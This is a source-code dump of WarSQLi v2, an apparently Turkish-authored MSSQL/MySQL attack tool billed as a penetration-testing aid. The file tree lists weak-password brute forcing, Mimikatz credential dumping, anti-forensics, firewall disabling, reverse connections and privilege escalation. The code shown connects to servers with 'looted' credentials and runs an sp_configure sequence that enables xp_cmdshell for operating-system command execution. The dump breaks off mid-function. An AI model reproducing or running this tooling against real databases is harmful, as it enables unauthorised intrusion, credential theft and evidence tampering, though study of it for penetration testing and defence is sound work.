├── .vs
└── WarSQLiv2
│ └── v14
│ └── .suo
├── README.md
├── WarSQLiv2.1Setup.exe
├── WarSQLiv2.sln
├── WarSQLiv2.sln.DotSettings.user
├── WarSQLiv2
├── App.config
├── App.xaml
├── App.xaml.cs
├── Exploitation
│ ├── Control
│ │ ├── FileCreationControl.cs
│ │ ├── FoundedSqlAddress.cs
│ │ ├── LanguageControl.cs
│ │ ├── LootedFileControl.cs
│ │ ├── MySqlServerGeneralControl.cs
│ │ ├── PassFileControl.cs
│ │ ├── SaveLootedServer.cs
│ │ ├── ToolStripInformation.cs
│ │ └── xpCmdShellControl.cs
│ └── PostExploitation
│ │ ├── EnableXpCmdShell.cs
│ │ ├── EncodeBase64.cs
│ │ ├── MsSqlPostExploitation.cs
│ │ ├── MySqlPostExploitation.cs
│ │ └── RottenPotato.cs
├── Language
│ ├── English.Designer.cs
│ ├── English.resx
│ └── Turkish.resx
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ ├── Resources.resx
│ ├── Settings.Designer.cs
│ └── Settings.settings
├── Startup.xaml
├── Startup.xaml.cs
├── UserControls
│ ├── Attack
│ │ └── MSSQL
│ │ │ ├── FrmAddMsSqlUser.xaml
│ │ │ ├── FrmAddMsSqlUser.xaml.cs
│ │ │ ├── FrmAddWindowsUser.xaml
│ │ │ ├── FrmAddWindowsUser.xaml.cs
│ │ │ ├── FrmAllPrograms.xaml
│ │ │ ├── FrmAllPrograms.xaml.cs
│ │ │ ├── FrmAntiForensics.xaml
│ │ │ ├── FrmAntiForensics.xaml.cs
│ │ │ ├── FrmBase64Converter.xaml
│ │ │ ├── FrmBase64Converter.xaml.cs
│ │ │ ├── FrmDirectoryManager.xaml
│ │ │ ├── FrmDirectoryManager.xaml.cs
│ │ │ ├── FrmDisableWindowsFirewall.xaml
│ │ │ ├── FrmDisableWindowsFirewall.xaml.cs
│ │ │ ├── FrmEnumMsSql.xaml
│ │ │ ├── FrmEnumMsSql.xaml.cs
│ │ │ ├── FrmMimikatzDump.xaml
│ │ │ ├── FrmMimikatzDump.xaml.cs
│ │ │ ├── FrmPowerShell.xaml
│ │ │ ├── FrmPowerShell.xaml.cs
│ │ │ ├── FrmPrivilegeEscalation.xaml
│ │ │ ├── FrmPrivilegeEscalation.xaml.cs
│ │ │ ├── FrmRdpManager.xaml
│ │ │ ├── FrmRdpManager.xaml.cs
│ │ │ ├── FrmReverseConnection.xaml
│ │ │ ├── FrmReverseConnection.xaml.cs
│ │ │ ├── FrmSendFileToMsSqlServer.xaml
│ │ │ ├── FrmSendFileToMsSqlServer.xaml.cs
│ │ │ ├── FrmServiceManager.xaml
│ │ │ ├── FrmServiceManager.xaml.cs
│ │ │ ├── FrmShowUserList.xaml
│ │ │ ├── FrmShowUserList.xaml.cs
│ │ │ ├── FrmSystemInfo.xaml
│ │ │ ├── FrmSystemInfo.xaml.cs
│ │ │ ├── FrmTaskManager.xaml
│ │ │ └── FrmTaskManager.xaml.cs
│ ├── Help
│ │ ├── FrmAbout.xaml
│ │ └── FrmAbout.xaml.cs
│ ├── WarSQLiAttack.xaml
│ └── WarSQLiAttack.xaml.cs
├── WarSQLiv2.csproj
├── WarSQLiv2.csproj.user
├── WarSQLiv2_TemporaryKey.pfx
├── bin
│ └── Debug
│ │ └── Scanner
│ │ ├── FoundServer
│ │ └── SqlServerList.txt
│ │ ├── Lang
│ │ └── Lang.txt
│ │ ├── Loading
│ │ ├── 1.png
│ │ ├── 1.txt
│ │ ├── 10.png
│ │ ├── 10.txt
│ │ ├── 11.png
│ │ ├── 11.txt
│ │ ├── 12.png
│ │ ├── 12.txt
│ │ ├── 13.png
│ │ ├── 13.txt
│ │ ├── 14.png
│ │ ├── 14.txt
│ │ ├── 15.png
│ │ ├── 15.txt
│ │ ├── 2.png
│ │ ├── 2.txt
│ │ ├── 3.png
│ │ ├── 3.txt
│ │ ├── 4.png
│ │ ├── 4.txt
│ │ ├── 5.png
│ │ ├── 5.txt
│ │ ├── 6.png
│ │ ├── 6.txt
│ │ ├── 7.png
│ │ ├── 7.txt
│ │ ├── 8.png
│ │ ├── 8.txt
│ │ ├── 9.png
│ │ └── 9.txt
│ │ ├── Looted
│ │ └── Looted.txt
│ │ ├── Mimikatz
│ │ ├── DLL_Injection.txt
│ │ └── Invoke-Mimikatz.txt
│ │ └── Wordlists
│ │ ├── Extended.txt
│ │ └── Fast.txt
├── icon.ico
├── logo.png
└── packages.config
└── packages
├── MaterialDesignColors.1.1.1
├── MaterialDesignColors.1.1.1.nupkg
└── lib
│ └── net45
│ └── MaterialDesignColors.dll
└── MaterialDesignThemes.1.2.0.339
├── MaterialDesignThemes.1.2.0.339.nupkg
└── lib
└── net45
└── MaterialDesignThemes.Wpf.dll
/.vs/WarSQLiv2/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/.vs/WarSQLiv2/v14/.suo
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # WarSQLi
2 | 
3 | Çeşitli kurum ve kuruluşlara "Penetrasyon Testi" hizmetleri veren "Siber Güvenlik" uzmanı ve "Bilgi Güvenliği" uzmanı arkadaşlarımın işlerini kolaylaştırmak için otomatize araçların eksikliği fark ettim. Bu eksikliğin giderilmesi için ihtiyaç duyulan işlevsel ve hataların giderildiği bu araçlar ile hem zaman tasarrufu hem de işlerin kolaylaştırılmasını amaçlamaktayım.
4 |
5 | Penetrasyon testlerinde en çok ihtiyaç duyulan stabil araçlardan biri de şüphesiz "SQL Audit" araçlarıdır. Bu noktada ihtiyaçların giderilmesi için WarSQLiv2 programını yazmaya karar verdim.
6 |
7 | WarSQLi; "SQL" sunucularında (MS-SQL, MySQL,) bulunan zayıf şifre denemelerini gerçekleştirmek ve tespit edilen SQL hesaplarını kullanarak post exploitation yapmak üzere geliştirilmiştir.
8 |
9 |
10 | Daha detaylı bilgi için lütfen blog yazısını okuyunuz. Blog yazısına ulaşmak için [tıklayınız](http://eyupcelik.com.tr/guvenlik/490-warsqliv2-kullanim-rehberi).
11 |
--------------------------------------------------------------------------------
/WarSQLiv2.1Setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2.1Setup.exe
--------------------------------------------------------------------------------
/WarSQLiv2.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.23107.0
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WarSQLiv2", "WarSQLiv2\WarSQLiv2.csproj", "{D0E3597E-6EE6-4DBB-8DAA-3C65DF640BA2}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D0E3597E-6EE6-4DBB-8DAA-3C65DF640BA2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {D0E3597E-6EE6-4DBB-8DAA-3C65DF640BA2}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {D0E3597E-6EE6-4DBB-8DAA-3C65DF640BA2}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {D0E3597E-6EE6-4DBB-8DAA-3C65DF640BA2}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/WarSQLiv2.sln.DotSettings.user:
--------------------------------------------------------------------------------
1 |
2 | <AssemblyExplorer>
3 | <Assembly Path="C:\Users\sKyWiPer\Documents\Visual Studio 2015\Projects\WarSQLiv2\packages\MaterialDesignColors.1.1.1\lib\net45\MaterialDesignColors.dll" />
4 | </AssemblyExplorer>
--------------------------------------------------------------------------------
/WarSQLiv2/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/WarSQLiv2/App.xaml:
--------------------------------------------------------------------------------
1 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/WarSQLiv2/App.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Configuration;
4 | using System.Data;
5 | using System.Linq;
6 | using System.Threading.Tasks;
7 | using System.Windows;
8 |
9 | namespace WarSQLiv2
10 | {
11 | ///
12 | /// Interaction logic for App.xaml
13 | ///
14 | public partial class App : Application
15 | {
16 | }
17 | }
18 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/Control/FileCreationControl.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 |
8 | namespace WarSQLiv2.Exploitation.Control
9 | {
10 | class FileCreationControl
11 | {
12 | private string _exception;
13 | private List _lstFoundedAddress;
14 |
15 | public List LstFoundedAddres
16 | {
17 | get { return _lstFoundedAddress; }
18 | set { _lstFoundedAddress = value; }
19 | }
20 | public string Exception
21 | {
22 | get { return _exception; }
23 | set { _exception = value; }
24 | }
25 | public void FileCreateControl()
26 | {
27 | var changeLang = new LanguageControl();
28 | changeLang.FindLang();
29 | var listDirecroty = Directory.GetFiles(@"Scanner\FoundServer\", "*.*", SearchOption.AllDirectories);
30 | if (listDirecroty.Count() > 20)
31 | {
32 | File.Delete(@"Scanner\FoundServer\*.*");
33 | }
34 | else
35 | {
36 | try
37 | {
38 | var rnd = new Random();
39 | var chr = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray();
40 | var randomFileName = string.Empty;
41 | Parallel.For(0, 10, i =>
42 | {
43 | randomFileName += chr[rnd.Next(0, chr.Length - 1)].ToString();
44 | });
45 | const string fileName = @"Scanner\FoundServer\SqlServerList.txt";
46 | var fileMoveName = @"Scanner\FoundServer\SqlServerList.txt.bak" + Convert.ToString(DateTime.Now.ToShortDateString());
47 | if (File.Exists(fileName))
48 | {
49 | if (File.Exists(fileMoveName))
50 | {
51 | File.Move(fileMoveName, fileMoveName + randomFileName);
52 | }
53 | File.Move(fileName, fileMoveName);
54 | }
55 | var createSqlServerListText = new StreamWriter(fileName);
56 | Parallel.For(0, LstFoundedAddres.Count, i =>
57 | {
58 | createSqlServerListText.WriteLine(LstFoundedAddres[i]);
59 | });
60 | createSqlServerListText.Flush();
61 | createSqlServerListText.Close();
62 | }
63 | catch (FileNotFoundException exp)
64 | {
65 | _exception = string.Empty;
66 | _exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
67 | }
68 | }
69 | }
70 | public void FileSizeControl()
71 | {
72 | var changeLang = new LanguageControl();
73 | changeLang.FindLang();
74 | try
75 | {
76 | var listDirecroty = Directory.GetFiles(@"Scanner\FoundServer\", "*.*", SearchOption.AllDirectories);
77 | if (listDirecroty.Count() > 20)
78 | {
79 | for (var i = 0; i < listDirecroty.Count(); i++)
80 | {
81 | File.Delete(listDirecroty[i]);
82 | }
83 | }
84 | }
85 | catch (Exception exp)
86 | {
87 | _exception = string.Empty;
88 | _exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
89 | }
90 | }
91 | }
92 | }
93 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/Control/FoundedSqlAddress.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 |
8 | namespace WarSQLiv2.Exploitation.Control
9 | {
10 | class FoundedSqlAddress
11 | {
12 | private List _addresList;
13 | private string _exception;
14 |
15 | public List AddressList
16 | {
17 | get { return _addresList; }
18 | set { _addresList = value; }
19 | }
20 | public string Exception
21 | {
22 | get { return _exception; }
23 | set { _exception = value; }
24 | }
25 | public void SqlServerFoundAddressFile()
26 | {
27 | var changeLang = new LanguageControl();
28 | changeLang.FindLang();
29 | try
30 | {
31 | var fileName = Directory.GetCurrentDirectory() + @"\Scanner\FoundServer\SqlServerList.txt";
32 | var foundSqlServerList = File.ReadLines(fileName);
33 | var sqlServerList = foundSqlServerList as string[] ?? foundSqlServerList.ToArray();
34 | AddressList = new List();
35 | for (var i = 0; i < sqlServerList.Count(); i++)
36 | {
37 | AddressList.Add(sqlServerList[i]);
38 | }
39 | }
40 | catch (Exception exp)
41 | {
42 | Exception = string.Empty;
43 | Exception += string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
44 | }
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/Control/LanguageControl.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.IO;
5 | using System.Linq;
6 | using System.Reflection;
7 | using System.Resources;
8 | using System.Text;
9 | using System.Threading.Tasks;
10 | using System.Windows;
11 |
12 | namespace WarSQLiv2.Exploitation.Control
13 | {
14 | class LanguageControl
15 | {
16 | private string _loadedLang;
17 | private string _setLanguage;
18 | public ResourceManager SelectedLanguage;
19 | public string SetLanguage
20 | {
21 | get
22 | {
23 | return _setLanguage;
24 | }
25 | set
26 | {
27 | _setLanguage = value;
28 | }
29 | }
30 | public string LoadedLang
31 | {
32 | get { return _loadedLang; }
33 | }
34 | public void FindLang()
35 | {
36 | try
37 | {
38 | var langInfo = "";
39 | var langFile = Directory.GetCurrentDirectory() + @"\Scanner\Lang\Lang.txt";
40 | var file = new FileStream(langFile, FileMode.Open, FileAccess.Read);
41 | var read = new StreamReader(file);
42 |
43 | for (var i = 0; i < 1; i++)
44 | {
45 | var readx = read.ReadToEnd();
46 | langInfo = readx;
47 | }
48 | read.Close();
49 | file.Close();
50 |
51 | if (langInfo != "English")
52 | {
53 | if (langInfo != "Turkish")
54 | {
55 | File.Delete(langFile);
56 | var sw = File.CreateText(langFile);
57 | sw.Write("English");
58 | sw.Close();
59 | var result = MessageBox.Show(Environment.NewLine + "Dil bilgisi dosyası bozulduğundan yeniden oluşturuldu. Lütfen programı tekrar çalıştırınız." + Environment.NewLine + "Lang file is restarted because it has been crashed. Please restart the programme.", "WarSQLi v2.0", MessageBoxButton.OK, MessageBoxImage.Information);
60 |
61 | if (result == MessageBoxResult.OK)
62 | {
63 | Process.Start(Application.ResourceAssembly.Location);
64 | Application.Current.Shutdown();
65 | }
66 | }
67 | }
68 | switch (langInfo)
69 | {
70 | case "English":
71 | _loadedLang = "English";
72 | break;
73 | case "Turkish":
74 | _loadedLang = "Turkish";
75 | break;
76 | }
77 | SelectedLanguage = new ResourceManager("WarSQLiv2.Language." + langInfo, Assembly.GetExecutingAssembly());
78 | }
79 | catch (Exception exp)
80 | {
81 | if (exp.Source == "mscorlib")
82 | {
83 | var sw = File.CreateText(Directory.GetCurrentDirectory() + @"\Scanner\Lang\Lang.txt");
84 | sw.Write("English");
85 | sw.Close();
86 | System.Windows.MessageBox.Show(Environment.NewLine + "Dil bilgisi dosyası bozulduğundan yeniden oluşturuldu. Lütfen programı tekrar çalıştırınız." + Environment.NewLine + "Lang file is restarted because it has been crashed. Please restart the programme.", "WarSQLi v2.0", MessageBoxButton.OK, MessageBoxImage.Information);
87 | Application.Current.Shutdown();
88 | }
89 | }
90 |
91 | }
92 | public void SetLang()
93 | {
94 | try
95 | {
96 | var sw = File.CreateText(Directory.GetCurrentDirectory() + @"\Scanner\Lang\Lang.txt");
97 | if (string.IsNullOrEmpty(SetLanguage))
98 | {
99 | sw.Write("English");
100 | }
101 | else
102 | {
103 | sw.Write(SetLanguage);
104 | }
105 | _loadedLang = SetLanguage;
106 | sw.Close();
107 | Process.Start(Application.ResourceAssembly.Location);
108 | Application.Current.Shutdown();
109 | }
110 | catch (Exception)
111 | {
112 | throw;
113 | }
114 | }
115 | }
116 | }
117 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/Control/LootedFileControl.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 | using System.Windows;
8 |
9 | namespace WarSQLiv2.Exploitation.Control
10 | {
11 | class LootedFileControl
12 | {
13 | private List _lootedList;
14 | private string _exception;
15 | public string Exception { get; private set; }
16 | public List LootedList
17 | {
18 | get { return _lootedList; }
19 | }
20 | public void FileControl()
21 | {
22 | var changeLang = new LanguageControl();
23 | changeLang.FindLang();
24 | try
25 | {
26 | var fileName = Directory.GetCurrentDirectory() + "\\Scanner\\Looted\\Looted.txt";
27 | var passText = File.ReadLines(fileName);
28 | var passwordText = passText as string[] ?? passText.ToArray();
29 | var passCount = passwordText.Count();
30 | _lootedList = new List();
31 | for (var i = 0; i < passCount; i++)
32 | {
33 | _lootedList.Add(passwordText[i]);
34 | }
35 | }
36 | catch (Exception exp)
37 | {
38 | Exception = string.Empty;
39 | Exception += string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
40 | }
41 | }
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/Control/MySqlServerGeneralControl.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Data.SqlClient;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 | using MySql.Data.MySqlClient;
8 |
9 | namespace WarSQLiv2.Exploitation.Control
10 | {
11 | class MySqlServerGeneralControl
12 | {
13 | private string _exception;
14 | private string _exploitResult;
15 | private string _exploitCode;
16 | private string _currentDb;
17 |
18 | public string CurrentDb
19 | {
20 | get { return _currentDb; }
21 | }
22 | public string Exception
23 | {
24 | get { return _exception; }
25 | set
26 | {
27 | _exception = string.Empty;
28 | _exception = value;
29 | }
30 | }
31 | public string ExploitResult
32 | {
33 | get { return _exploitResult; }
34 | }
35 | public string SelectedItem { get; set; }
36 |
37 | public List LootedList { get; set; }
38 | private void LootedControl()
39 | {
40 | var lootedFileControl = new LootedFileControl();
41 | try
42 | {
43 | lootedFileControl.FileControl();
44 | var lootedList = lootedFileControl.LootedList;
45 | foreach (var t in lootedList)
46 | {
47 | LootedList.Add(t);
48 | }
49 | }
50 | catch (Exception exp)
51 | {
52 | Exception = lootedFileControl.Exception;
53 | }
54 | }
55 | private void GetDatabaseControl()
56 | {
57 | LootedControl();
58 | var changeLang = new LanguageControl();
59 | changeLang.FindLang();
60 | if (!string.IsNullOrEmpty(SelectedItem))
61 | {
62 | var split = SelectedItem.Split(':');
63 | var server = split[0];
64 | var user = split[2];
65 | var pass = split[3];
66 | var con = new MySqlConnectionStringBuilder() { Server = server, UserID = user, Password = pass };
67 | var mysqlConn = new MySqlConnection(con.ToString());
68 | try
69 | {
70 | var cmd = new MySqlCommand(_exploitCode, mysqlConn);
71 | mysqlConn.Open();
72 | var rdr = cmd.ExecuteReader();
73 | _exploitResult = string.Empty;
74 | while (rdr.Read())
75 | {
76 | _exploitResult += $"{Environment.NewLine}{rdr[0]}";
77 | }
78 | rdr.Close();
79 | mysqlConn.Close();
80 | }
81 | catch (SqlException exp)
82 | {
83 | Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
84 | }
85 | }
86 | else
87 | {
88 | Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
89 | }
90 | }
91 | public void GetCurrentDb()
92 | {
93 | _exploitCode = string.Empty;
94 | _exploitCode = "show databases";
95 | GetDatabaseControl();
96 | _currentDb = _exploitResult;
97 | }
98 | }
99 | }
100 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/Control/SaveLootedServer.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 |
8 | namespace WarSQLiv2.Exploitation.Control
9 | {
10 | class SaveLootedServer
11 | {
12 | private string _exception;
13 | private List _lootedPasswordList;
14 |
15 | public List LootedPasswordList
16 | {
17 | get { return _lootedPasswordList; }
18 | set { _lootedPasswordList = value; }
19 | }
20 | public string Exception
21 | {
22 | get { return _exception; }
23 | set { _exception = value; }
24 | }
25 |
26 | public void SaveLootedSqlServer()
27 | {
28 | var changeLang = new LanguageControl();
29 | changeLang.FindLang();
30 | try
31 | {
32 | var fileName = Directory.GetCurrentDirectory() + @"\Scanner\Looted\Looted.txt";
33 | if (File.Exists(fileName))
34 | {
35 | File.Delete(fileName);
36 | }
37 | var createSqlServerListText = new StreamWriter(fileName);
38 | for (var i = 0; i < _lootedPasswordList.Count; i++)
39 | {
40 | createSqlServerListText.WriteLine(_lootedPasswordList[i]);
41 | }
42 | createSqlServerListText.Flush();
43 | createSqlServerListText.Close();
44 | }
45 | catch (Exception exp)
46 | {
47 | Exception = string.Empty;
48 | Exception += string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
49 | }
50 | }
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/Control/ToolStripInformation.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Data.SqlClient;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 | using MySql.Data.MySqlClient;
8 |
9 | namespace WarSQLiv2.Exploitation.Control
10 | {
11 | class ToolStripInformation
12 | {
13 | private string _sqlServerInfo;
14 | private string _exception;
15 | private string _mySqlUserName;
16 | private string _mySqlUserPass;
17 | ///
18 | /// Fırlatılan Exception'ı yakalayıp kullanıcıya göstermek için kullanılacak
19 | ///
20 | public string Exception
21 | {
22 | get { return _exception; }
23 | set
24 | {
25 | _exception = string.Empty;
26 | _exception = value;
27 | }
28 | }
29 | public string SqlServerInfo
30 | {
31 | get { return _sqlServerInfo; }
32 | }
33 | public List LootedList { get; set; }
34 | ///
35 | /// Seçilen Listbox item'ını SelectedItem değerine mutlaka set etmemiz gerekir. Bu değer lstLooted'ın selectedItems'ının değeri olmalıdır.
36 | ///
37 | public string SelectedLootedServer { get; set; }
38 | public string Command { get; set; }
39 | public string MySqlUserName { get; set; }
40 | public string MySqlUserPass { get; set; }
41 |
42 | public void SqlServerInformation()
43 | {
44 | LootedControl();
45 | var changeLang = new LanguageControl();
46 | changeLang.FindLang();
47 | var exploitCode = Command;
48 | if (!string.IsNullOrEmpty(SelectedLootedServer))
49 | {
50 | var parcala = SelectedLootedServer.Split(':');
51 | var server = parcala[0];
52 | var user = parcala[2];
53 | var pass = parcala[3];
54 | var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
55 | try
56 | {
57 | var conn = new SqlConnection(conS);
58 | var cmd = new SqlCommand(exploitCode, conn);
59 | conn.Open();
60 | var rdr = cmd.ExecuteReader();
61 | _sqlServerInfo = string.Empty;
62 | var sqlInfo = new List();
63 | while (rdr.Read())
64 | {
65 | sqlInfo.Add($"{Environment.NewLine}{rdr[2]}");
66 | }
67 | _sqlServerInfo = "Server IP: " + parcala[0] + " Server Version: " + sqlInfo[1].Replace("\r\n", "");
68 | rdr.Close();
69 | conn.Close();
70 |
71 | }
72 | catch (SqlException exp)
73 | {
74 | Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
75 | }
76 | }
77 | else
78 | {
79 | Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
80 | }
81 | }
82 |
83 | public void MySqlServerInformation()
84 | {
85 | LootedControl();
86 | var changeLang = new LanguageControl();
87 | changeLang.FindLang();
88 | if (!string.IsNullOrEmpty(SelectedLootedServer))
89 | {
90 | var split = SelectedLootedServer.Split(':');
91 | var server = split[0];
92 | var user = split[2];
93 | var pass = split[3];
94 | var con = new MySqlConnectionStringBuilder() { Server = server, UserID = user, Password = pass };
95 | var mysqlConn = new MySqlConnection(con.ToString());
96 | try
97 | {
98 | const string addUserCmd = "SHOW GLOBAL VARIABLES LIKE '%version%';";
99 | var cmd = new MySqlCommand(addUserCmd, mysqlConn);
100 | mysqlConn.Open();
101 | var rdr = cmd.ExecuteReader();
102 | _sqlServerInfo = string.Empty;
103 | var sqlInfo = new List();
104 | while (rdr.Read())
105 | {
106 | sqlInfo.Add($"{Environment.NewLine}{rdr[1]}");
107 | }
108 | rdr.Close();
109 | mysqlConn.Close();
110 | _sqlServerInfo = " Server Version: " + sqlInfo[3].Replace("\r\n", "") + " Innodb_Version: " + sqlInfo[0].Replace("\r\n", "") + " Platform: " + sqlInfo[6].Replace("\r\n", "");
111 | }
112 | catch (SqlException exp)
113 | {
114 | Exception = string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
115 | }
116 | }
117 | else
118 | {
119 | Exception = $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
120 | }
121 | }
122 | private void LootedControl()
123 | {
124 | var lootedFileControl = new LootedFileControl();
125 | try
126 | {
127 | lootedFileControl.FileControl();
128 | var lootedList = lootedFileControl.LootedList;
129 | foreach (var t in lootedList)
130 | {
131 | LootedList.Add(t);
132 | }
133 | }
134 | catch (Exception exp)
135 | {
136 | Exception = lootedFileControl.Exception;
137 | }
138 | }
139 | }
140 | }
141 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/Control/xpCmdShellControl.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace WarSQLiv2.Exploitation.Control
8 | {
9 | public class xpCmdShellControl
10 | {
11 | public bool isActivated { get; set; }
12 | public bool isExecuted { get; set; }
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/WarSQLiv2/Exploitation/PostExploitation/EnableXpCmdShell.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Data.SqlClient;
3 | using System.Windows.Threading;
4 | using WarSQLiv2.Exploitation.Control;
5 |
6 | namespace WarSQLiv2.Exploitation.PostExploitation
7 | {
8 | class EnableXpCmdShell
9 | {
10 | xpCmdShellControl cmdControl = new xpCmdShellControl();
11 | public string LootedServer { get; set; }
12 | public string Result { get; private set; }
13 | public string CmdException { get; private set; }
14 | public void XpCmdShellStatus()
15 | {
16 | var changeLang = new LanguageControl();
17 | changeLang.FindLang();
18 | const string xpCmdShellStatusCommand = "SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell'";
19 | if (!string.IsNullOrEmpty(LootedServer))
20 | {
21 | var parcala = LootedServer.Split(':');
22 | var server = parcala[0];
23 | var user = parcala[2];
24 | var pass = parcala[3];
25 | var conS = "Server=" + server + ";Database=master;Uid=" + user + ";Pwd=" + pass + ";";
26 | try
27 | {
28 | var conn = new SqlConnection(conS);
29 | var cmd = new SqlCommand(xpCmdShellStatusCommand, conn);
30 | conn.Open();
31 | var cmdResult = -1;
32 | var rdr = cmd.ExecuteReader();
33 | while (rdr.Read())
34 | {
35 | cmdResult = Convert.ToInt32(rdr[0]);
36 | }
37 | rdr.Close();
38 | conn.Close();
39 | if (cmdResult > 0)
40 | {
41 | Dispatcher.CurrentDispatcher.Invoke(new Action(() =>
42 | {
43 | cmdControl.isActivated = true;
44 | Result = Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell2");
45 | }));
46 | }
47 | else
48 | {
49 | Dispatcher.CurrentDispatcher.Invoke(new Action(() =>
50 | {
51 | cmdControl.isActivated = false;
52 | XpCmdShellReConfig();
53 | }));
54 | }
55 | }
56 | catch (SqlException exp)
57 | {
58 | CmdException += string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, changeLang.SelectedLanguage.GetString("GeneralError1"), changeLang.SelectedLanguage.GetString("GeneralError2"));
59 | }
60 | }
61 | else
62 | {
63 | Result += $"{Environment.NewLine}{changeLang.SelectedLanguage.GetString("MessageExploitError1")}";
64 | }
65 | }
66 | private void XpCmdShellReConfig()
67 | {
68 | Dispatcher.CurrentDispatcher.Invoke(new Action(() =>
69 | {
70 | var changeLang = new LanguageControl();
71 | changeLang.FindLang();
72 | Result += Environment.NewLine + changeLang.SelectedLanguage.GetString("XPCmdShell3");
73 | var openXpCmdShell = "EXEC sp_configure 'show advanced options', 1;\n";
74 | openXpCmdShell += "RECONFIGURE;\n";
75 | openXpCmdShell += "EXEC sp_configure 'xp_cmdshell', 1;\n";
76 | openXpCmdShell += "RECONFIGURE;\n";
77 | openXpCmdShell += "EXEC sp_configure 'show advanced options', 0;\n";
78 | openXpCmdShell += "RECONFIGURE;\n";
